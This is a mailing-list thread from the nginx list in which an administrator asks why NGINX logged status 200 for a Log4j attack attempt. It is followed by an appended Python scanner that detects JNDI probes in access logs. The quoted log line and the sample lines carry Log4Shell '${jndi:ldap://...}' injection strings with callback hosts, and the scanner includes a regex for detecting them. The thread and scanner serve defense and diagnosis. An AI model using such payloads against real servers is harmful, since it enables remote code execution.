Help request about Log4j attack attempts and NGINX logs meaning

Mauro Tridici mauro.tridici at cmcc.it
Wed Dec 29 17:17:14 UTC 2021


Thank you very much for your reply. I really appreciated it.
I’ll wait for the final gurus’ feedback too.

Mauro

> On 29 Dec 2021, at 18:03, lists <lists at lazygranch.com> wrote:
> 
> That IP space is certified shady. I detect the occasional hack from them. See 
> 
> https://krebsonsecurity.com/2019/08/the-rise-of-bulletproof-residential-networks/
> 
> and
> 
> https://wirelessdataspco.org/faq.php
> 
> These wireless companies will do anything for money including leasing their IP space. 
> 
> I don't block the IP space since it could be from normal users. Plus plenty of hacking comes from actual wireless providers' customers. But I am appalled that highly profitable wireless providers lease IPv4 space to hackers for what is pocket change for them. 
> 
> I will leave it up to the gurus to parse the log.  
> 
> 
> Original Message
> 
> From: mauro.tridici at cmcc.it
> Sent: December 29, 2021 6:55 AM
> To: nginx at nginx.org
> Reply-to: nginx at nginx.org
> Subject: Help request about Log4j attack attempts and NGINX logs meaning
> 
> Dear Users,
> 
> 
> I have an old instance of NGINX (v.1.10.1) running as a proxy server on a dedicated hardware platform.
> Since the proxy service is reachable from the internet, it is constantly exposed to cyber attacks.
> In my particular case, it is attacked by a lot of Log4j attack attempts from several malicious IPs.
> 
> 
> At this moment, a host intrusion detection system (HIDS) is running and is protecting the NGINX server: it seems it is blocking every malicious attack attempt.
> Anyway, in the last attack mail notification sent by the HIDS, I noticed that the NGINX server response was "HTTP/1.1 200" and I’m very worried about it.
> Log4j and Java packages are NOT installed on the NGINX server, and none of the servers behind the proxy are using Log4j.
> 
> 
> Could you please help me to understand the reason why the NGINX server's answer was "HTTP/1.1 200"!?
> 
> 
> You can see below the mail notification I received:
> 
> 
> 
> Attack Notification.
> 2021 Dec 28 20:45:59
> 
> Received From: "hidden_NGINX_server_IP" ->/var/log/nginx/access.log
> Rule: 100205 fired (level 12) -> "Log4j RCE attack attempt detected."
> Src IP: 166.137.252.110
> Portion of the log(s):
> 
> 166.137.252.110 - - [28/Dec/2021:21:45:58 +0100] "GET /?sulgz=${jndi:ldap://"hidden_NGINX_server_IP".c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a} HTTP/1.1" 200 3700 "-" "curl/7.64.0" "-"
> 
> 
> Thank you in advance,
> Mauro 
> _______________________________________________
> nginx mailing list
> nginx at nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx
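An added example, not code from the thread or from the NGINX project: a small Python scanner for the kind of access-log line quoted above. It parses the default NGINX "combined" format, URL-decodes the request, and extracts the JNDI scheme and callback host of any `${jndi:...}` probe together with the status NGINX logged. The status is NGINX's (or the upstream's) response to the HTTP request itself; NGINX never evaluates the `${jndi:...}` string, so a 200 only says the request was served, not that a lookup was resolved. The sample lines are constructed with documentation addresses and an `.invalid` callback host.

```python
import re
import urllib.parse
from dataclasses import dataclass
from typing import List, Optional

# NGINX default "combined" log format; re.match tolerates extra trailing fields
# such as the "-" ($http_x_forwarded_for) seen at the end of the quoted line.
COMBINED_RE = re.compile(
    r'(?P<remote>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<bytes>\d+|-) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# A JNDI lookup as used by Log4Shell probes, e.g. ${jndi:ldap://host/a}.
JNDI_RE = re.compile(r'\$\{jndi:(?P<scheme>[a-z]+):(?P<target>[^}]*)\}', re.IGNORECASE)

# Constructed sample lines (assumed format; hosts/addresses are placeholders).
PROBE_LINE = ('203.0.113.10 - - [28/Dec/2021:21:45:58 +0100] '
              '"GET /?sulgz=${jndi:ldap://callback.example.invalid/a} HTTP/1.1" '
              '200 3700 "-" "curl/7.64.0" "-"')
ENCODED_LINE = ('203.0.113.11 - - [28/Dec/2021:21:46:02 +0100] '
                '"GET /?x=%24%7Bjndi%3Aldap%3A%2F%2Fcallback.example.invalid%2Fa%7D HTTP/1.1" '
                '200 3700 "-" "curl/7.64.0" "-"')
BENIGN_LINE = ('198.51.100.7 - - [28/Dec/2021:21:47:10 +0100] '
               '"GET /index.html HTTP/1.1" 200 3700 "-" "Mozilla/5.0" "-"')


@dataclass
class Finding:
    remote: str           # source address of the probe
    status: int           # status NGINX logged for the request (not proof of exploitation)
    scheme: str           # jndi scheme requested (ldap, rmi, dns, ...)
    callback_host: str    # host the attacker hoped a vulnerable Log4j would contact


def parse_combined(line: str) -> Optional[dict]:
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def find_jndi_probe(line: str) -> Optional[Finding]:
    """Return a Finding if the request line carries a JNDI lookup, else None."""
    rec = parse_combined(line)
    if rec is None:
        return None
    decoded = urllib.parse.unquote(rec["request"])   # scanners often percent-encode ${ }
    m = JNDI_RE.search(decoded)
    if m is None:
        return None
    host = m.group("target").lstrip("/").split("/")[0].split(":")[0]
    return Finding(rec["remote"], int(rec["status"]), m.group("scheme").lower(), host)


def scan(lines: List[str]) -> List[Finding]:
    return [f for f in (find_jndi_probe(l) for l in lines) if f is not None]
```

Such findings are worth alerting on as reconnaissance, but the only real check is whether any service on the request path runs a vulnerable Log4j; the logged status does not answer that.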
